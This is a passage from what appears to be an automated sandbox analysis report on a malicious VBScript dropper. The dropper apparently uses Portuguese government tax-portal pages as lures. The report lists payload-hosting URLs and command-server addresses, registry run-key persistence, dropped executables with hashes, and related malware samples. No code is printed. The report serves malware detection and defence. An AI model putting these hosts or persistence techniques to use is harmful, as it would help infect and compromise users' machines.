| https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardrvc | wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://94.241.141.101/dm4/publi.php | lspcv2.exe, 00000009.00000002.2982463608.00000145E49BC000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4B | artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4C | artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp401 | artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                                                                          https://happychristmaslegado.s3.eu-north-1.amazonaws.com/artigo.exe, 00000005.00000002.2970291807.0000020EFAC1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://heapanalytics.com/js/ved.csswscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=Cwscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Yartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferewscript.exe, wscript.exe, 00000000.00000003.1830358182.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://s3.timeweb.com/41907bc4-chronocromdocrom/one/cnf.txtplace.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                              high
                                                                              https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bifartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://heapanalytics.com/css/ved.csswscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://185.178.46.42/vo/place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmp, place.exe, 00000008.00000002.2972396912.000001477F56A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://185.178.46.42/vo/Uplace.exe, 00000008.00000002.2967068820.00000002F938A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardcwscript.exe, 00000000.00000003.1684071613.0000022321D2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://heapanalytics.comwscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
16.12.9.46 | unknown | United States | unknown | unknown | true
92.53.116.138 | s3.timeweb.com | Russian Federation | 9123 | TIMEWEB-ASRU | false
94.241.141.101 | unknown | Iran (ISLAMIC Republic Of) | 39650 | ATRINCOMMUNICATIONIR | false
16.12.9.14 | s3-r-w.eu-north-1.amazonaws.com | United States | unknown | unknown | false
62.28.254.215 | www.acesso.gov.pt | Portugal | 15525 | MEO-EMPRESASPT | false
62.28.254.212 | www.portaldasfinancas.gov.pt | Portugal | 15525 | MEO-EMPRESASPT | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.185.196 | www.google.com | United States | 15169 | GOOGLEUS | false
152.199.21.175 | sni1gl.wpc.rhocdn.net | United States | 15133 | EDGECASTUS | false

IP
192.168.2.16
192.168.2.4

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555843
Start date and time: 2024-11-14 14:58:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: guia_luqf.vbs
Detection: MAL
Classification: mal88.evad.winVBS@26/72@18/11
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.78, 66.102.1.84, 34.104.35.123, 142.250.186.170, 142.250.186.106, 172.217.16.202, 142.250.185.202, 142.250.185.138, 142.250.185.234, 142.250.185.170, 142.250.181.234, 142.250.184.234, 142.250.184.202, 216.58.206.42, 142.250.185.74, 142.250.185.106, 172.217.18.10, 172.217.16.138, 142.250.186.42, 2.22.50.131, 192.229.221.95, 142.250.186.163, 142.250.185.78
• Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, staticpf.azureedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, staticpf.ec.azureedge.net, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
• Execution Graph export aborted for target lspcv2.exe, PID 3220 because there are no executed function
• Execution Graph export aborted for target lspcv2.exe, PID 7912 because there are no executed function
• Execution Graph export aborted for target place.exe, PID 5316 because there are no executed function
• Execution Graph export aborted for target place.exe, PID 7544 because there are no executed function
• HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: guia_luqf.vbs

Time | Type | Description
09:00:12 | API Interceptor | 2x Sleep call for process: artigo.exe modified
09:00:26 | API Interceptor | 3x Sleep call for process: place.exe modified
09:00:36 | API Interceptor | 3482x Sleep call for process: lspcv2.exe modified
14:00:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iplace c:\Intrumental\place.exe
14:00:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LSP c:\Intrumental\lspcv2.exe
14:00:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iplace c:\Intrumental\place.exe
14:00:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LSP c:\Intrumental\lspcv2.exe
                                                                                                          • 92.53.106.114
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 92.53.116.138
                                                                                                          MEO-EMPRESASPTguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.233.1
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 62.28.254.212
                                                                                                          5tSAlF2WkT.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.237
                                                                                                          ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.203
                                                                                                          M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.203
                                                                                                          IlyNpnwGBF.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 62.28.37.224
                                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.223
                                                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 83.240.195.245
                                                                                                          ATRINCOMMUNICATIONIRguia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Stacks.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 94.241.141.101
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          28a2c9bd18a11de089ef85a160da29e4INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://embeds.beehiiv.com/64a15014-2eab-4da5-b4be-84e59873fb46Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://securedvoicemailcallalerts.invoclegal.com/TFjjC?e=vendormasterap@saic.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.anwesso.com/link.php?link=3D78_02_04_79_88_2B016-4C-01-3D9662EEC8D094AFED274D8E17627986-06D38F7B48CB30B897Get hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          https://www.softwareaktion.com/kostenloser-vergleichGet hashmaliciousUnknownBrowse
                                                                                                          • 4.245.163.56
                                                                                                          • 172.202.163.200
                                                                                                          • 184.28.90.27
                                                                                                          • 13.107.246.45
                                                                                                          37f463bf4616ecd445d4a1937da06e19Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          u06cfykCat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          4p8aK00tUr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          aC5NsSYmN0.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          RFQ for WIKA_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          SOfQumBuFd.exeGet hashmaliciousBinder HackTool, Stealc, VidarBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          nvxdbat.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          Company Profile_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 16.12.9.46
                                                                                                          • 92.53.116.138
                                                                                                          • 16.12.9.14
                                                                                                          Match | Associated Sample Name / URL | Detection | Threat Name
                                                                                                          C:\Intrumental\lspcv2.exe | guia_evfs.vbs | malicious | Unknown
                                                                                                          C:\Intrumental\place.exe | guia_evfs.vbs | malicious | Unknown
                                                                                                          C:\Users\Public\Termos\artigo.exe | guia_evfs.vbs | malicious | Unknown
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32891509
                                                                                                                Entropy (8bit):6.984510229105189
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:dGN9uNwx0JaNeQ37X6e7Wmv/T3JILcyoGMYRV+Aal4VqTbWvqeifLAdUpO/7Ajka:0uNmQQLX6e7Wmv/T3JILcyoGMYRV+AaR
                                                                                                                MD5:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                SHA1:B1B2B9321AC1BB01FF0DC667D01C136B14AC8448
                                                                                                                SHA-256:FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
                                                                                                                SHA-512:D6F67A5BEF88F325A80436AD507893302BE5E2C15D130AF2D49B87509F4074EAEE83B4318175DA61FDF1A98A37A8BFCDD071389C3C82F2D69285CFA901B2CD59
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....4g..........".......H.u\......0.G.......@..............................@............`..........@............... ................P.q....`P.vH...`X......`T...............Q..]....+.......................P.(...................8rP.......P......................text...X.H.......H................. ..`.data.........H.......H.............@....bss....H.....O..........................idata..vH...`P..J...\O.............@....didata.......P.......O.............@....edata..q.....P.......O.............@..@.tls..........P..........................rdata..m.....P.......O.............@..@.reloc...]....Q..^....O.............@..B.pdata.......`T.......S.............@..@.rsrc........`X.......W.............@..@.debug..u,....+.u,....).............@..@
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19375329
                                                                                                                Entropy (8bit):5.784574984483087
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:393216:DYmHv3sV7zW8tZAxQlmbRpi6GbyUjA1eHOI1izeYgHdSu2Je4QG0a1SaNWoRvahP:cmHv3sV7zW8tZAxQlmbRpi6GbyUjA1e7
                                                                                                                MD5:971CB0CF2672A22241854896998DDE20
                                                                                                                SHA1:F3C6338B7319C20FB56FA471202B631364BE81F1
                                                                                                                SHA-256:7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
                                                                                                                SHA-512:EC2943865B2C6769962001375AF3FFBCEAE56A9A12F2D98771D4AFB4C03B2275BA37304C801F337450C528D6F3C1D9254DC5830CFE6230A4A06C45585A5DCF62
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....}4g..........".......H...........G.......@...............................(...........`..........@............... ................Q.q.....P.vH....X.......T..............@Q.p^....\......................0Q.(...................8.P.......P......................text.....H.......H................. ..`.data...8.....H.......H.............@....bss..........O..........................idata..vH....P..J....O.............@....didata.......P.......O.............@....edata..q.....Q.......P.............@..@.tls......... Q..........................rdata..m....0Q.......P.............@..@.reloc..p^...@Q..`....P.............@..B.pdata........T......pS.............@..@.rsrc.........X......fW.............@..@.debug...f....\..f...>[.............@..@
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18292220
                                                                                                                Entropy (8bit):7.998857421458994
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:393216:d68zAibFiPbPSmQahTBmraKohh6fg0J1cx7FqzL09SiDb6l7:cwxbFiPbqmQahTEr1oh06Jqn095b6l7
                                                                                                                MD5:9029E36BDCE303D81F2BBD1869A8E147
                                                                                                                SHA1:D8D715FB21DEFDA4D56A363C97423D481F8F3C93
                                                                                                                SHA-256:184F6393E1222558122593F4DB0CF03D45F6D99A1D7E39EE7994A2B9AFEF7018
                                                                                                                SHA-512:25669F81CE3DFADF77B2017633C79525F7958EE18F052CB83A6B8650FFFD0B097973082A416786114A34269CA1A35239B8CDBEC94F7799BBFD9AD0BC73D5A0DB
                                                                                                                Malicious:true
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):30932098
                                                                                                                Entropy (8bit):7.035895727775689
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:iN9uNwx0JaNeQ36RIBiO+j31XoGJnu7ohvtzk+ULOuMsnMOinoEfi28VXQUUbFJu:2uNmQQqRIBiO+j31XoGJnu7ohvtzk+UB
                                                                                                                MD5:31DF1F6E455D2A740E1A90E413F9DB68
                                                                                                                SHA1:F22E1D673D1FB90FE0792A168F02FDB0E5B97916
                                                                                                                SHA-256:648BDF024A96BEEEBCC3D1936755753D984D787F8354A7B45DB8FFF3700DC02D
                                                                                                                SHA-512:21837DCA413A5A7C1D6F76B76470A57DEFD5DC30E1E37086F1B46E3D28F3A72D03263F8D1F86183BDEC7A965FF7A6BB7118B83BEF5C9DF207F0CC77C12E8ED34
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious, Browse
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18292220
                                                                                                                Entropy (8bit):7.998857421458994
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:393216:d68zAibFiPbPSmQahTBmraKohh6fg0J1cx7FqzL09SiDb6l7:cwxbFiPbqmQahTEr1oh06Jqn095b6l7
                                                                                                                MD5:9029E36BDCE303D81F2BBD1869A8E147
                                                                                                                SHA1:D8D715FB21DEFDA4D56A363C97423D481F8F3C93
                                                                                                                SHA-256:184F6393E1222558122593F4DB0CF03D45F6D99A1D7E39EE7994A2B9AFEF7018
                                                                                                                SHA-512:25669F81CE3DFADF77B2017633C79525F7958EE18F052CB83A6B8650FFFD0B097973082A416786114A34269CA1A35239B8CDBEC94F7799BBFD9AD0BC73D5A0DB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19375329
                                                                                                                Entropy (8bit):5.784574984483087
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:393216:DYmHv3sV7zW8tZAxQlmbRpi6GbyUjA1eHOI1izeYgHdSu2Je4QG0a1SaNWoRvahP:cmHv3sV7zW8tZAxQlmbRpi6GbyUjA1e7
                                                                                                                MD5:971CB0CF2672A22241854896998DDE20
                                                                                                                SHA1:F3C6338B7319C20FB56FA471202B631364BE81F1
                                                                                                                SHA-256:7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
                                                                                                                SHA-512:EC2943865B2C6769962001375AF3FFBCEAE56A9A12F2D98771D4AFB4C03B2275BA37304C801F337450C528D6F3C1D9254DC5830CFE6230A4A06C45585A5DCF62
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32891509
                                                                                                                Entropy (8bit):6.984510229105189
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:dGN9uNwx0JaNeQ37X6e7Wmv/T3JILcyoGMYRV+Aal4VqTbWvqeifLAdUpO/7Ajka:0uNmQQLX6e7Wmv/T3JILcyoGMYRV+AaR
                                                                                                                MD5:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                SHA1:B1B2B9321AC1BB01FF0DC667D01C136B14AC8448
                                                                                                                SHA-256:FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
                                                                                                                SHA-512:D6F67A5BEF88F325A80436AD507893302BE5E2C15D130AF2D49B87509F4074EAEE83B4318175DA61FDF1A98A37A8BFCDD071389C3C82F2D69285CFA901B2CD59
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7168
                                                                                                                Entropy (8bit):4.33498652991827
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:r+KRsPeyq/1AVW0T1MqughNY1IkAKOSuPlQ95Sut1y7MOkh3vadRNJykhuLdHxRb:Hp5UJ4CljM58dRequRRMKF15h
                                                                                                                MD5:7EF557BFBCC455B975A932F6ECE6A1C9
                                                                                                                SHA1:F171C2428996A33B40841B6A365B838359B9AD41
                                                                                                                SHA-256:6CB56ACF319A26EF2E9B0075D6119DE5507F2279AFA0871B6384B2D84A8EC639
                                                                                                                SHA-512:CE4F2B5838DBFF4F2A950F9ED6B1AB94E6398B3EDFE7E0D787BF861ABB88877644B3B0B9B53D05291CCDDF8810BF5DDA13C0C036F6048B5CA1B00730661690F4
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (3614)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):52750
                                                                                                                Entropy (8bit):5.126938085076369
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:BWb7KCiCNGgkh6CITR/Pi9nZPZF63G8TKn2a5IhtD8JruIkdfFcAfruQ:BWb7KCiCXvCIN/PipFFd2a5Cp
                                                                                                                MD5:0018B40D63991C2CF7FAEF055278D18A
                                                                                                                SHA1:74DB551A452CD34B4350ADB690C94D5CD0FCDC3F
                                                                                                                SHA-256:804A8CD28C517C5325DCF9283373C0B3D0387AF2A5AB6DD6D73AFDD65026565F
                                                                                                                SHA-512:F810D51B517F045E1EBAB2DF9942CF6C8A86529C7273A20157E77A4D3D0C47C725C946115F5F9B2DD47066BCB32446822702DA02059E3AC09E69ABC6F91096D8
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10
                                                                                                                Preview:..main-header-body{background:#ffffff;border-bottom:solid 1px #ececec;padding:15px 0;position:relative;z-index:1;-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);}..shadow{-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);}..logo{display:block;}.logo img{width:210px;height:auto !important;}.nav ul{text-align:right;margin-top:10px;margin-bottom:0;}.nav li{display:inline-block;list-style:none;text-align:center;margin-left:30px;max-width:130px;}.nav a{color:#031437;font-weight:700;text-transform:uppercase;font-size:16px;display:block;}nav a:hover{color:#0375f6;}..burger-menu{display:none;}..main-header-title{margin-top:24px;}.main-header-title p{font-weight:700;font-size:24px;text-transform:uppercase;text-align:center;color:#001C44;}..orange{background-color:#ff604e
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):58651
                                                                                                                Entropy (8bit):3.8223322827985586
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:IWb2inOxtoJ6VpwRl13/+4gw0SnG/0S8f0S8wkGfktk/mhE+:Bb22OxOJ6Vpw/13m4gSmhE+
                                                                                                                MD5:7CEF22B9E1BF64EC9597396229900B3A
                                                                                                                SHA1:8E9024B218DCAE87E5451663753BC8607110A2C0
                                                                                                                SHA-256:9206C9C869B248A0BC222DB370113845B0D7BEC0FB0C7CE7AF957D9D2AB2E28D
                                                                                                                SHA-512:D9AEDD640CFDFA3E50425C781FB6C05484DDFCDFCE5946AB07C2C489C59C4E37EC7B93DF79F75FF6084742BA64A46494A210F80D8ABCE071DBB1C1F914F504A5
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.10
